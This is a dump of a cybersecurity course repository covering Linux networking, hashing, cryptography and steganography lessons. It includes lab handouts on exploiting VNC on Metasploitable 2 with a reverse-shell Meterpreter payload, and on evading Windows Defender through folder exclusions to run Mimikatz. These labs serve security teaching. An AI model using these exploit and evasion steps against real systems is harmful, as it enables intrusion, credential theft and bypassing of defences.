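# functions on it (one world-writable entry, one empty entry, one missing
# directory, one relative entry).
path_demo() {
    scratch=$(mktemp -d)
    mkdir -p "$scratch/bin" "$scratch/shared"
    chmod 755 "$scratch/bin"
    chmod 777 "$scratch/shared"
    printf '#!/bin/sh\necho hello from mytool\n' > "$scratch/bin/mytool"
    chmod 755 "$scratch/bin/mytool"
    demo_path="$scratch/shared:$scratch/bin::$scratch/missing:scripts"
    echo "mytool resolves to: $(path_lookup "$demo_path" mytool)"
    path_audit "$demo_path" || echo "audit result: risky entries found"
    rm -rf "$scratch"
}

path_demo
```

To audit the live environment instead of the demo, call `path_audit "$PATH"`.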
--------------------------------------------------------------------------------
/week1/manually_calculate_hash_value.md:
--------------------------------------------------------------------------------
### **🔹 How to Manually Calculate a Hashed Value & Identify Hash Corruption**

A **hash function** takes an input and produces a fixed-size output (digest), ensuring data integrity. If even **one bit** of the input changes, the hash changes drastically.

---

## **📌 Manually Calculating a Hash**
You can manually compute a hash using **mathematical steps** or **hashing tools** like OpenSSL, Python, or Linux commands.

### **🔹 1️⃣ Using OpenSSL (SHA-256)**
Run this command in a terminal:
```bash
openssl dgst -sha256 file.txt
```
✅ **Example Output:**
```
SHA256(file.txt)= e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
```
This is the hash of `file.txt`. Note that this particular digest is the SHA-256 of empty input: if you see it for a file that should have content, the file is empty (for example after a failed download), and the check has already told you something.

---

### **🔹 2️⃣ Using Python (SHA-256)**
```python
import hashlib

# Read file and calculate SHA-256 hash
with open("file.txt", "rb") as f:
    file_data = f.read()
    hash_value = hashlib.sha256(file_data).hexdigest()

print("SHA-256 Hash:", hash_value)
```
✅ **Output Example:**
```
SHA-256 Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
```

---

### **🔹 3️⃣ Manually Calculating Hash (Conceptual)**
A simple **modular hashing function** example:
```
hash = (sum of ASCII values of characters) % 256
```
For `"hello"`:
```
h (104) + e (101) + l (108) + l (108) + o (111) = 532
532 % 256 = 20 → Hash value = 20
```
🔹 **Note:** Real-world hashing (SHA, MD5) involves **bitwise operations, padding, and compression functions**, and is designed so that two different inputs with the same digest are infeasible to find; the toy function above has no such property (`"olleh"` also hashes to 20).

---

## **📌 How to Identify a Corrupt Hash**
### **🔹 1️⃣ Compare Hash Before & After Transfer**
1.
Generate the **original file hash**: 58 | ```bash 59 | sha256sum file.txt 60 | ``` 61 | 2. Transfer the file. 62 | 3. Generate the **new hash**: 63 | ```bash 64 | sha256sum file_received.txt 65 | ``` 66 | 4. Compare both hashes. 67 | - ✅ **If they match** → File is intact. 68 | - ❌ **If different** → File is corrupted or tampered. 69 | 70 | --- 71 | 72 | ### **🔹 2️⃣ Detect Hash Corruption in Digital Signatures** 73 | If a digital signature is based on a corrupted hash, it will **fail verification**. 74 | ```bash 75 | openssl dgst -sha256 -verify public_key.pem -signature file.sig file.txt 76 | ``` 77 | ✅ **Valid Signature Output:** 78 | ``` 79 | Verified OK 80 | ``` 81 | ❌ **Corrupted Signature Output:** 82 | ``` 83 | Verification Failure 84 | ``` 85 | 86 | --- 87 | 88 | ### **🔹 3️⃣ Check File Integrity with `diff`** 89 | Use `diff` to check differences in files: 90 | ```bash 91 | diff file.txt file_received.txt 92 | ``` 93 | If output shows **differences**, the file is corrupt. 94 | 95 | --- 96 | 97 | ## **🔹 Summary** 98 | | **Action** | **Command** | 99 | |------------|------------| 100 | | Generate hash (SHA-256) | `sha256sum file.txt` | 101 | | Compare hashes | `sha256sum file1.txt file2.txt` | 102 | | Verify digital signature | `openssl dgst -sha256 -verify` | 103 | | Check file corruption | `diff file1.txt file2.txt` | 104 | -------------------------------------------------------------------------------- /week2/day6_ip_roting.md: -------------------------------------------------------------------------------- 1 | ### **IP Routing in Linux** 2 | 3 | IP routing is a critical process in Linux networking that determines how network packets travel from one host to another, ensuring data reaches its correct destination. The Linux kernel handles routing, using routing tables to decide the best path for packets across a network. 
4 | 5 | --- 6 | 7 | ### **Understanding Routing Tables** 8 | 9 | A routing table is essentially a set of rules that tells the system where to send packets based on their destination IP addresses. Each entry in the routing table specifies: 10 | - **Destination**: The network or host to route packets to. 11 | - **Gateway**: The next-hop address packets should take. 12 | - **Interface**: The network interface to use for the route. 13 | 14 | --- 15 | 16 | ### **Essential Commands for IP Routing** 17 | 18 | #### **1. View the Routing Table** 19 | To display the current routing table, use: 20 | ```bash 21 | ip route show 22 | ``` 23 | Example output: 24 | ``` 25 | default via 192.168.1.1 dev eth0 26 | 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.100 27 | ``` 28 | Explanation: 29 | - **default via 192.168.1.1 dev eth0**: The default route (used for all packets without a specific route) goes through the gateway `192.168.1.1` on the interface `eth0`. 30 | - **192.168.1.0/24 dev eth0**: Packets destined for the `192.168.1.0/24` network are sent directly through `eth0`. 31 | 32 | #### **2. Add a New Route** 33 | To add a static route to a specific network: 34 | ```bash 35 | sudo ip route add 192.168.2.0/24 via 192.168.1.1 dev eth0 36 | ``` 37 | This command adds a route for the network `192.168.2.0/24`, specifying that packets should go through the gateway `192.168.1.1` on `eth0`. 38 | 39 | #### **3. Delete a Route** 40 | To delete a route: 41 | ```bash 42 | sudo ip route del 192.168.2.0/24 43 | ``` 44 | 45 | #### **4. Set a Default Gateway** 46 | To set or update the default route (default gateway): 47 | ```bash 48 | sudo ip route add default via 192.168.1.1 49 | ``` 50 | 51 | #### **5. Flush All Routes** 52 | To clear all routes from the routing table: 53 | ```bash 54 | sudo ip route flush table main 55 | ``` 56 | 57 | --- 58 | 59 | ### **Persistent Routing** 60 | 61 | Changes made with the `ip` command are temporary and will be lost after a reboot. 
To make routes permanent, they must be added to network configuration files. 62 | 63 | For example, in Debian-based distributions, add routes to `/etc/network/interfaces`: 64 | ```conf 65 | auto eth0 66 | iface eth0 inet static 67 | address 192.168.1.100 68 | netmask 255.255.255.0 69 | gateway 192.168.1.1 70 | up ip route add 192.168.2.0/24 via 192.168.1.1 dev eth0 71 | ``` 72 | 73 | On Red Hat-based systems, use `/etc/sysconfig/network-scripts/ifcfg-eth0`: 74 | ```conf 75 | DEVICE=eth0 76 | BOOTPROTO=none 77 | ONBOOT=yes 78 | IPADDR=192.168.1.100 79 | NETMASK=255.255.255.0 80 | GATEWAY=192.168.1.1 81 | ``` 82 | 83 | --- 84 | 85 | ### **Tips for IP Routing in Linux** 86 | - Use `traceroute` or `ping` to debug and verify network routes. 87 | - Use the `ip route` command for modern Linux systems, as it provides more functionality and is the preferred tool over `ifconfig` or `route`. 88 | - Always test new routes before making them permanent to ensure they work as intended. 89 | -------------------------------------------------------------------------------- /week1/day5_FHS.md: -------------------------------------------------------------------------------- 1 | ### **Understanding the Linux Directory Hierarchy** 2 | 3 | The **Linux directory hierarchy** organizes files and directories in a structured, tree-like format, making it easy to manage and locate system resources. This structure is based on the **Filesystem Hierarchy Standard (FHS)**, which defines a logical arrangement of directories. 4 | 5 | --- 6 | 7 | ### **Key Directories and Their Purpose** 8 | 9 | 1. **`/` (Root Directory)** 10 | - The topmost directory of the Linux filesystem. 11 | - All other files and directories are located under `/`. 12 | - Accessible only by the **root user** or users with elevated privileges for system-wide changes. 13 | 14 | --- 15 | 16 | 2. **`/home` (Home Directories)** 17 | - Contains individual user directories. 18 | - Each user gets a subdirectory to store personal files. 
19 | - Example: `/home/username`. 20 | 21 | --- 22 | 23 | 3. **`/bin` (Essential Binary Executables)** 24 | - Stores **basic command-line utilities** required for the system to operate. 25 | - Examples: `ls`, `cat`, `cp`, `mv`. 26 | 27 | --- 28 | 29 | 4. **`/sbin` (System Administration Binaries)** 30 | - Contains **administrative commands** used by the root user for system management. 31 | - Examples: `ifconfig`, `reboot`, `fsck`. 32 | 33 | --- 34 | 35 | 5. **`/etc` (Configuration Files)** 36 | - Holds **system-wide configuration files** and settings. 37 | - Examples: `/etc/passwd`, `/etc/fstab`, `/etc/hosts`. 38 | 39 | --- 40 | 41 | 6. **`/var` (Variable Data)** 42 | - Used for files that change frequently, such as: 43 | - Logs: `/var/log` 44 | - Spool files: `/var/spool` 45 | - Temporary email storage. 46 | 47 | --- 48 | 49 | 7. **`/usr` (User Programs and Data)** 50 | - Stores **user-installed programs**, libraries, and documentation. 51 | - Common subdirectories: 52 | - `/usr/bin`: Additional command binaries. 53 | - `/usr/share`: Shared data like icons and documentation. 54 | 55 | --- 56 | 57 | 8. **`/lib` (Shared Libraries)** 58 | - Contains essential **shared libraries** required by binaries in `/bin` and `/sbin`. 59 | - Think of it as similar to `.dll` files in Windows. 60 | 61 | --- 62 | 63 | 9. **`/tmp` (Temporary Files)** 64 | - Stores **temporary files** created by programs and processes. 65 | - Files here are usually deleted after a reboot or when no longer needed. 
66 | 67 | --- 68 | 69 | ### **Visualizing the Hierarchy** 70 | Here’s a simplified view of the directory hierarchy: 71 | 72 | ``` 73 | / 74 | ├── home/ 75 | │ ├── user1/ 76 | │ ├── user2/ 77 | ├── bin/ 78 | ├── sbin/ 79 | ├── etc/ 80 | ├── var/ 81 | │ ├── log/ 82 | │ ├── spool/ 83 | ├── usr/ 84 | │ ├── bin/ 85 | │ ├── share/ 86 | ├── lib/ 87 | ├── tmp/ 88 | ``` 89 | 90 | --- 91 | 92 | ### **Why Understanding the Hierarchy is Important** 93 | - **Efficient Navigation:** Knowing where files are located saves time. 94 | - **System Management:** Helps in troubleshooting and configuring system components. 95 | - **Avoid Errors:** Prevents accidental deletion or modification of critical files. 96 | 97 | By mastering the Linux directory hierarchy, you gain a deeper understanding of how the system operates and can work with it more efficiently! 98 | -------------------------------------------------------------------------------- /projects/vnc_task.md: -------------------------------------------------------------------------------- 1 | # Task: Exploiting VNC Service on Metasploitable 2 (Port 5900) 2 | 3 | ### Learning Objectives 4 | 5 | By the end of this exercise, students will be able to: 6 | 7 | * Perform service enumeration on a target system. 8 | * Identify the VNC service running on port `5900`. 9 | * Use Metasploit to exploit weak authentication in VNC. 10 | * Gain a remote shell session on Metasploitable 2. 11 | * Understand the importance of secure configurations for remote desktop services. 12 | 13 | 14 | 15 | ### Background 16 | 17 | Metasploitable 2 is an intentionally vulnerable Linux machine used for penetration testing practice. One of its services, **VNC (Virtual Network Computing)**, is exposed on port **5900**. VNC allows remote desktop access, but if misconfigured (like using weak authentication), attackers can gain control of the system. 
18 | 19 | 20 | 21 | ### Lab Requirements 22 | 23 | * Kali Linux (Attacker) 24 | * Metasploitable 2 (Target) 25 | * Both machines on the same network (e.g., VirtualBox/VMware Host-only or NAT network). 26 | 27 | 28 | 29 | ### Step 1: Reconnaissance with Nmap 30 | 31 | Scan Metasploitable to find open ports: 32 | 33 | ```bash 34 | nmap -sV -p 5900 35 | ``` 36 | 37 | * `-sV` → Detect service version 38 | * `-p 5900` → Scan only the VNC port 39 | 40 | 👉 Expected Output: 41 | Shows `5900/tcp open vnc`. 42 | 43 | 44 | 45 | ### Step 2: Search for Vulnerabilities in Metasploit 46 | 47 | Start Metasploit: 48 | 49 | ```bash 50 | msfconsole 51 | ``` 52 | 53 | Search for VNC-related exploits: 54 | 55 | ```bash 56 | search vnc 57 | ``` 58 | 59 | 👉 You should find modules like: 60 | 61 | * `auxiliary/scanner/vnc/vnc_none_auth` 62 | * `exploit/multi/vnc/vnc_keyboard_exec` 63 | * `auxiliary/scanner/vnc/vnc_login` 64 | 65 | 66 | 67 | ### Step 3: Use the VNC Authentication Bypass Module 68 | 69 | Select the module: 70 | 71 | ```bash 72 | use auxiliary/scanner/vnc/vnc_none_auth 73 | ``` 74 | 75 | Set target IP: 76 | 77 | ```bash 78 | set RHOSTS 79 | run 80 | ``` 81 | 82 | 👉 If vulnerable, it confirms **no authentication is required**. 83 | 84 | 85 | 86 | ### Step 4: Exploit and Gain Access 87 | 88 | Now, attempt to interact with the session: 89 | 90 | ```bash 91 | use exploit/multi/vnc/vnc_keyboard_exec 92 | set RHOST 93 | set PAYLOAD linux/x86/meterpreter/reverse_tcp 94 | set LHOST 95 | exploit 96 | ``` 97 | 98 | 👉 Expected Result: 99 | You get a **Meterpreter session** or a remote shell on Metasploitable. 100 | 101 | 102 | 103 | ### Step 5: Post-Exploitation 104 | 105 | Once inside: 106 | 107 | ```bash 108 | shell 109 | whoami 110 | uname -a 111 | ``` 112 | 113 | * Confirm you have remote access. 114 | * Enumerate the system. 115 | 116 | 117 | ### Step 6: Discussion / Mitigation 118 | 119 | * Why is running VNC without authentication dangerous? 120 | * How should VNC be secured? 
(passwords, encryption, network restrictions, VPNs). 121 | 122 | 123 | 124 | ### Deliverables for Students 125 | 126 | * Nmap scan result screenshot. 127 | * Proof of successful VNC exploitation (shell access). 128 | * Short write-up: *“How could this vulnerability be prevented in a real system?”* 129 | -------------------------------------------------------------------------------- /week2/day5_dhcp.md: -------------------------------------------------------------------------------- 1 | ### **Dynamic Host Configuration Protocol (DHCP) in Linux** 2 | 3 | DHCP (Dynamic Host Configuration Protocol) is an essential protocol for managing and automating IP address assignments in a network. In Linux, it simplifies network management by dynamically allocating IP addresses and providing additional configuration details such as DNS servers, gateway addresses, and more. 4 | 5 | --- 6 | 7 | ### **How DHCP Works** 8 | 1. **Client Request**: A client device sends a broadcast request (DHCPDISCOVER) asking for an IP address. 9 | 2. **Server Offer**: A DHCP server responds with an available IP address (DHCPOFFER). 10 | 3. **Client Acceptance**: The client accepts the offer by sending a DHCPREQUEST message. 11 | 4. **Server Acknowledgment**: The server confirms the lease by sending a DHCPACK message. 12 | 13 | --- 14 | 15 | ### **Setting Up a DHCP Server in Linux** 16 | 17 | #### **1. Installation** 18 | On Debian-based systems (like Ubuntu): 19 | ```bash 20 | sudo apt-get install isc-dhcp-server 21 | ``` 22 | 23 | #### **2. 
Configuration** 24 | After installation, configure the DHCP server by editing its main configuration file: 25 | ```bash 26 | sudo nano /etc/dhcp/dhcpd.conf 27 | ``` 28 | 29 | **Basic Configuration Example:** 30 | ```conf 31 | # Define the subnet and its IP range 32 | subnet 192.168.1.0 netmask 255.255.255.0 { 33 | range 192.168.1.100 192.168.1.200; 34 | option routers 192.168.1.1; # Default gateway 35 | option domain-name-servers 8.8.8.8, 8.8.4.4; # DNS servers 36 | option domain-name "example.com"; # Domain name 37 | default-lease-time 600; # Lease duration in seconds 38 | max-lease-time 7200; # Maximum lease duration 39 | } 40 | ``` 41 | 42 | Save and close the file after editing. 43 | 44 | #### **3. Restart the DHCP Service** 45 | To apply changes, restart the DHCP service: 46 | ```bash 47 | sudo systemctl restart isc-dhcp-server 48 | ``` 49 | 50 | #### **4. Verify the Configuration** 51 | Check for errors in the configuration: 52 | ```bash 53 | sudo dhcpd -t 54 | ``` 55 | 56 | --- 57 | 58 | ### **Key Points to Remember** 59 | - **Static IP for Server**: Ensure the DHCP server itself has a static IP address for stable operation. 60 | - **Leases**: DHCP leases are temporary. The lease duration determines how long a device can use the assigned IP. 61 | - **Logs**: Monitor logs for DHCP activity: 62 | ```bash 63 | tail -f /var/log/syslog 64 | ``` 65 | 66 | --- 67 | 68 | ### **DHCP Client on Linux** 69 | To configure a Linux machine as a DHCP client: 70 | 1. Open the network configuration file, typically located in `/etc/network/interfaces` (Debian-based) or `/etc/sysconfig/network-scripts/` (Red Hat-based). 71 | 2. Set the interface to use DHCP: 72 | 73 | **Example (Debian-based):** 74 | ```conf 75 | auto eth0 76 | iface eth0 inet dhcp 77 | ``` 78 | 79 | 3. 
Restart the network service: 80 | ```bash 81 | sudo systemctl restart networking 82 | ``` 83 | 84 | --- 85 | 86 | ### **Troubleshooting Tips** 87 | - **No IP Address Assigned**: Verify the DHCP server is running and reachable. 88 | - **Conflict Issues**: Check for overlapping IP ranges in your network. 89 | - **Test Connectivity**: Use `ping`, `ifconfig`, or `ip addr` to verify network settings. 90 | 91 | --- 92 | -------------------------------------------------------------------------------- /projects/stegganography.md: -------------------------------------------------------------------------------- 1 | ### **Lesson 1: Introduction to Steganography** 2 | **Objective:** Students will understand the concept of steganography, its purpose, and how it differs from cryptography. 3 | 4 | **Activities:** 5 | 1. **Presentation & Discussion** 6 | - Define steganography and its importance in cybersecurity. 7 | - Compare steganography vs. cryptography with real-world examples. 8 | - Show historical examples (e.g., invisible ink, microdots, null ciphers). 9 | 10 | 2. **Hands-on Practical: Identifying Hidden Data** 11 | - Provide students with a set of images, some with hidden data and some without. 12 | - Use tools like `Stegsolve` to analyze and determine if an image contains hidden messages. 13 | - Encourage students to think about steganography detection techniques. 14 | 15 | --- 16 | 17 | ### **Lesson 2: Image Steganography** 18 | **Objective:** Students will learn how to hide and extract messages from images. 19 | 20 | **Activities:** 21 | 1. **Least Significant Bit (LSB) Insertion** 22 | - Explain how the least significant bit in pixel values is modified to hide data. 23 | - Demonstrate this manually by converting pixel values to binary and altering them. 24 | 25 | 2. **Practical Exercise: Using Steghide** 26 | - Install `Steghide` on Kali Linux (`sudo apt install steghide`). 
27 | - Use the following commands to hide and extract data from an image: 28 | 29 | **Hiding data:** 30 | ```bash 31 | steghide embed -cf image.jpg -ef secret.txt -p password 32 | ``` 33 | **Extracting data:** 34 | ```bash 35 | steghide extract -sf image.jpg -p password 36 | ``` 37 | 38 | 3. **Stegsolve for Image Analysis** 39 | - Use `Stegsolve` to analyze different image layers. 40 | - Students inspect images for anomalies. 41 | 42 | --- 43 | 44 | ### **Lesson 3: Audio Steganography** 45 | **Objective:** Students will hide and extract messages from audio files. 46 | 47 | **Activities:** 48 | 1. **Understanding Audio Steganography** 49 | - Explain how modifying frequency or amplitude can embed hidden data. 50 | - Discuss tools like `Sonic Visualiser` and `DeepSound`. 51 | 52 | 2. **Practical Exercise: Using DeepSound** 53 | - Install `DeepSound` on Windows (or use Wine on Kali). 54 | - Hide text inside an audio file and extract it. 55 | 56 | 3. **Analyzing Audio Files with Sonic Visualiser** 57 | - Open an audio file and visualize waveforms and spectrograms. 58 | - Try to detect hidden messages. 59 | 60 | --- 61 | 62 | ### **Lesson 4: Advanced Steganography & Detection Techniques** 63 | **Objective:** Students will learn advanced steganography techniques and how forensic analysts detect hidden messages. 64 | 65 | **Activities:** 66 | 1. **Exploring Different Steganography Techniques** 67 | - Discuss Redundant Pattern Encoding, Encrypt & Scatter methods. 68 | 69 | 2. **Practical Exercise: Steganalysis** 70 | - Use `stegdetect` to analyze images: 71 | ```bash 72 | stegdetect image.jpg 73 | ``` 74 | - Perform statistical analysis on modified images. 75 | 76 | 3. **Red Team vs. Blue Team Exercise** 77 | - Divide students into attackers (hiding messages) and defenders (detecting them). 78 | - Use a set of images/audio files to challenge each other. 
79 | -------------------------------------------------------------------------------- /week1/crypto_project.md: -------------------------------------------------------------------------------- 1 | ### **Beginner Cryptography Project: Secure File Transfer with Encryption & Digital Signatures** 2 | 3 | This project will help students apply cryptography concepts practically by encrypting, signing, and verifying files before securely transferring them. 4 | 5 | --- 6 | 7 | ## **📌 Project: Secure File Transfer System** 8 | ### **🛠 Goal:** 9 | - Encrypt a file before sending it. 10 | - Sign the file using a digital signature. 11 | - Verify the signature and decrypt the file upon receipt. 12 | 13 | --- 14 | 15 | ## **1️⃣ Project Breakdown** 16 | ### **📌 Step 1: Generate RSA Keys** 17 | Each user needs a **public-private key pair** for encryption and signing. 18 | 19 | ```bash 20 | # Generate private key (receiver) 21 | openssl genpkey -algorithm RSA -out receiver_private.pem 22 | 23 | # Extract public key (for sender to use) 24 | openssl rsa -pubout -in receiver_private.pem -out receiver_public.pem 25 | 26 | # Generate private key (sender) 27 | openssl genpkey -algorithm RSA -out sender_private.pem 28 | 29 | # Extract public key (for receiver to use) 30 | openssl rsa -pubout -in sender_private.pem -out sender_public.pem 31 | ``` 32 | 33 | --- 34 | 35 | ### **📌 Step 2: Encrypt the File (Sender)** 36 | Before sending a file, encrypt it using the **receiver's public key** so only the receiver can decrypt it. 37 | 38 | ```bash 39 | # Encrypt the file with the receiver's public key 40 | openssl rsautl -encrypt -pubin -inkey receiver_public.pem -in secret.txt -out secret.enc 41 | ``` 42 | 43 | --- 44 | 45 | ### **📌 Step 3: Create a Digital Signature (Sender)** 46 | To ensure the file is authentic and not tampered with, the sender signs the encrypted file using their **private key**. 
47 | 48 | ```bash 49 | # Create a signature for the encrypted file 50 | openssl dgst -sha256 -sign sender_private.pem -out secret.sig secret.enc 51 | ``` 52 | 53 | --- 54 | 55 | ### **📌 Step 4: Send Files Securely** 56 | The sender now sends **two files** to the receiver: 57 | 1. `secret.enc` (Encrypted file) 58 | 2. `secret.sig` (Digital signature) 59 | 60 | --- 61 | 62 | ### **📌 Step 5: Verify the Signature (Receiver)** 63 | Before decrypting, the receiver **verifies** the sender's signature using the sender’s **public key**. 64 | 65 | ```bash 66 | # Verify the signature 67 | openssl dgst -sha256 -verify sender_public.pem -signature secret.sig secret.enc 68 | ``` 69 | ✅ If the signature is valid, the file is authentic and not modified. 70 | 71 | --- 72 | 73 | ### **📌 Step 6: Decrypt the File (Receiver)** 74 | After verification, the receiver decrypts the file using their **private key**. 75 | 76 | ```bash 77 | # Decrypt the file with the receiver’s private key 78 | openssl rsautl -decrypt -inkey receiver_private.pem -in secret.enc -out secret_decrypted.txt 79 | ``` 80 | ✅ The original file is now recovered. 81 | 82 | --- 83 | 84 | ## **2️⃣ Project Enhancements** 85 | To take it further: 86 | - Build a **Python script** to automate encryption, signing, and verification. 87 | - Implement **AES symmetric encryption** for large files instead of RSA. 88 | - Use a **web interface** to encrypt, sign, and verify files. 89 | 90 | --- 91 | 92 | ## **3️⃣ Learning Outcomes** 93 | ✔ Understand **RSA encryption** and **digital signatures**. 94 | ✔ Use **OpenSSL for secure file transfers**. 95 | ✔ Verify data authenticity with **signatures**. 96 | ✔ Gain hands-on cryptography experience. 
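An added example, not the project's own code: a POSIX shell script that automates Steps 1 to 6 end to end with the `openssl` CLI, implements the "AES for large files" enhancement (the payload is encrypted with AES-256 and only a random session key is wrapped with RSA), and finishes with the tamper check from the hash notes, where a modified ciphertext makes verification fail before anything is decrypted. It assumes OpenSSL 1.1.1 or newer and uses `openssl pkeyutl` with OAEP padding instead of `rsautl`, which OpenSSL 3 deprecates; the `sft_*` function names and file names are this example's own.

```shell
#!/bin/sh
# Added example (not the project's own code): automates Steps 1-6 of the
# secure file transfer with the OpenSSL CLI. Two deliberate changes from the
# step-by-step commands: the payload is encrypted with AES-256 and only the
# random session key is wrapped with RSA (the "AES for large files"
# enhancement), and pkeyutl with OAEP padding replaces the deprecated rsautl.
# All function and file names are this example's own choices.

# sft_gen_keys DIR NAME -> DIR/NAME_private.pem and DIR/NAME_public.pem (Step 1)
sft_gen_keys() {
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
        -out "$1/$2_private.pem" 2>/dev/null || return 1
    openssl rsa -in "$1/$2_private.pem" -pubout -out "$1/$2_public.pem" 2>/dev/null
}

# sft_send DIR PLAINTEXT -> DIR/secret.enc, DIR/session.key.enc, DIR/secret.sig
# (Steps 2 and 3, sender side)
sft_send() {
    dir=$1
    # Fresh 256-bit session key, never reused across transfers
    openssl rand -hex 32 > "$dir/session.key" || return 1
    # Step 2 (hybrid): AES-256-CBC for the payload, RSA-OAEP for the key only
    openssl enc -aes-256-cbc -pbkdf2 -salt -pass "file:$dir/session.key" \
        -in "$2" -out "$dir/secret.enc" || return 1
    openssl pkeyutl -encrypt -pubin -inkey "$dir/receiver_public.pem" \
        -pkeyopt rsa_padding_mode:oaep -pkeyopt rsa_oaep_md:sha256 \
        -in "$dir/session.key" -out "$dir/session.key.enc" || return 1
    # Step 3: sign the wrapped key AND the ciphertext together, so neither
    # part can be swapped in transit without the signature failing
    cat "$dir/session.key.enc" "$dir/secret.enc" |
        openssl dgst -sha256 -sign "$dir/sender_private.pem" \
            -out "$dir/secret.sig" || return 1
    rm -f "$dir/session.key"        # the plaintext key never leaves the sender
}

# sft_receive DIR OUTPUT (Steps 5 and 6, receiver side)
# Returns 1 and writes nothing if the signature does not verify.
sft_receive() {
    dir=$1
    # Step 5: verify first; a corrupted hash shows up as "Verification Failure"
    cat "$dir/session.key.enc" "$dir/secret.enc" |
        openssl dgst -sha256 -verify "$dir/sender_public.pem" \
            -signature "$dir/secret.sig" >/dev/null 2>&1 || return 1
    # Step 6: unwrap the session key with the receiver's private key, then decrypt
    openssl pkeyutl -decrypt -inkey "$dir/receiver_private.pem" \
        -pkeyopt rsa_padding_mode:oaep -pkeyopt rsa_oaep_md:sha256 \
        -in "$dir/session.key.enc" -out "$dir/session.key.rx" || return 1
    openssl enc -d -aes-256-cbc -pbkdf2 -pass "file:$dir/session.key.rx" \
        -in "$dir/secret.enc" -out "$2" || return 1
    rm -f "$dir/session.key.rx"
}

# sft_demo DIR: full round trip on a constructed file, then a tamper test.
# Returns 0 only if the plaintext is recovered AND the tampered copy is rejected.
sft_demo() {
    dir=$1
    printf 'constructed sample payload for the lab\n' > "$dir/secret.txt"
    sft_gen_keys "$dir" receiver || return 1
    sft_gen_keys "$dir" sender || return 1
    sft_send "$dir" "$dir/secret.txt" || return 1
    sft_receive "$dir" "$dir/secret_decrypted.txt" || return 1
    cmp -s "$dir/secret.txt" "$dir/secret_decrypted.txt" || return 1
    # Corrupt the ciphertext in transit (one extra byte): the signature must fail
    printf 'X' >> "$dir/secret.enc"
    if sft_receive "$dir" "$dir/tampered.txt"; then
        echo "tampered ciphertext was accepted"; return 1
    fi
    echo "round trip OK; tampered ciphertext rejected"
}

# Running this file directly performs the demo in a throwaway directory.
scratch=$(mktemp -d) && sft_demo "$scratch"; rm -rf "$scratch"
```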
97 | -------------------------------------------------------------------------------- /projects/mimikaz_projects.md: -------------------------------------------------------------------------------- 1 | # Lab Assignment: Excluding a Folder from Antivirus Scanning & Running Mimikatz 2 | 3 | ### **Background** 4 | 5 | Malware often uses different methods to evade antivirus (AV) detection. One simple trick is storing and running programs from folders excluded from AV scanning. Security software won’t scan excluded folders, making it possible for malicious tools to run undetected. 6 | 7 | In this lab, you will demonstrate this concept by excluding a folder from AV scanning and executing **Mimikatz** (a well-known post-exploitation tool). 8 | 9 | Mimikatz is a powerful tool used by attackers to steal passwords. You must only use it in your **controlled lab VM** and **never on real or production systems**. 10 | 11 | 12 | 13 | ### **Learning Objectives** 14 | 15 | 1. Understand how antivirus exclusions work. 16 | 2. Practice configuring AV exclusions on Windows. 17 | 3. Demonstrate how attackers can abuse exclusions to run tools like Mimikatz. 18 | 19 | 20 | 21 | ### **Specifications** 22 | 23 | #### 1. Goal 24 | 25 | * Exclude a folder from AV scanning. 26 | * Show that Mimikatz is blocked outside the excluded folder. 27 | * Run Mimikatz successfully inside the excluded folder. 28 | 29 | 30 | 31 | #### 2. Lab Setup 32 | 33 | * Windows Virtual Machine (Windows 10/11, or Windows Server) 34 | * Antivirus enabled (Windows Defender recommended) 35 | * Administrative privileges on the VM 36 | * Download Mimikatz from its **official GitHub repository**: 37 | 🔗 [https://github.com/gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) 38 | 39 | 40 | 41 | #### 3. Configure Folder Exclusion 42 | 43 | 1. Create a folder (example: `C:\LabExcluded`) 44 | 2. Open **Windows Security** → **Virus & threat protection** 45 | 3. 
Under **Virus & threat protection settings**, click **Manage settings** 46 | 4. Scroll to **Exclusions → Add or remove exclusions** 47 | 5. Add your folder (`C:\LabExcluded`) 48 | 49 | 50 | 51 | #### 4. Exercise Steps 52 | 53 | 1. **Download Mimikatz** 54 | 55 | * Try to extract or run Mimikatz from **Downloads folder** (or Desktop). 56 | * Windows Defender should block it. 57 | * Screenshot this. 58 | 59 | 2. **Move to Excluded Folder** 60 | 61 | * Place Mimikatz inside your `C:\LabExcluded` folder. 62 | * Run it from inside this excluded folder. 63 | * This time, Mimikatz should run successfully. 64 | 65 | 3. **Demonstrate Execution** 66 | 67 | * Launch `mimikatz.exe` 68 | * Run a harmless command inside Mimikatz (e.g., `version` or `help`) just to prove execution. 69 | * Do **NOT** run password-dumping commands for this exercise. 70 | 71 | 72 | 73 | #### 5. Validation 74 | 75 | * ✅ Show that Mimikatz is blocked outside the excluded folder. 76 | * ✅ Show that Mimikatz runs successfully inside the excluded folder. 77 | * ✅ Provide screenshots (or a video) of both cases. 78 | 79 | 80 | #### 6. Submission Requirements 81 | 82 | * A **short report** (1–2 pages) including: 83 | 84 | * Steps you followed. 85 | * Screenshots showing folder exclusion, failed execution, and successful execution. 86 | * A brief explanation: *“Why excluding folders from AV scanning is risky and how attackers abuse this technique.”* 87 | 88 | * A **video recording** (optional, for extra credit): 89 | 90 | * Show exclusion setup. 91 | * Show Defender blocking Mimikatz outside excluded folder. 92 | * Show successful execution inside excluded folder. 
--------------------------------------------------------------------------------
/week2/day7_dns.md:
--------------------------------------------------------------------------------
### **DNS Resolution in Linux Networking**

The Domain Name System (DNS) simplifies networking by translating human-readable domain names (like `www.example.com`) into machine-readable IP addresses (like `192.0.2.1`). This process, called DNS resolution, is vital for connecting to websites and other network services.

---

### **How DNS Resolution Works**

1. **Querying the Resolver**: When a Linux application needs to resolve a domain name, it queries the DNS resolver.
2. **Checking Local Cache**: The resolver checks its cache for previously resolved domain names to avoid unnecessary lookups.
3. **Using `/etc/resolv.conf`**: If the cache doesn’t contain the result, the resolver refers to the `/etc/resolv.conf` file to determine which DNS servers to query.
4. **DNS Server Lookup**: The specified DNS server resolves the domain name into an IP address and sends it back to the resolver.
5. **Connecting to the IP**: The application uses the resolved IP address to establish a connection.

---

### **Essential DNS Commands in Linux**

#### **1. Query DNS Using `nslookup`**
The `nslookup` command queries DNS servers to fetch domain-to-IP mappings.
```bash
nslookup www.example.com
```
Example output:
```
Server:     8.8.8.8
Address:    8.8.8.8#53

Non-authoritative answer:
Name:       www.example.com
Address:    93.184.216.34
```

#### **2. Query DNS Using `dig`**
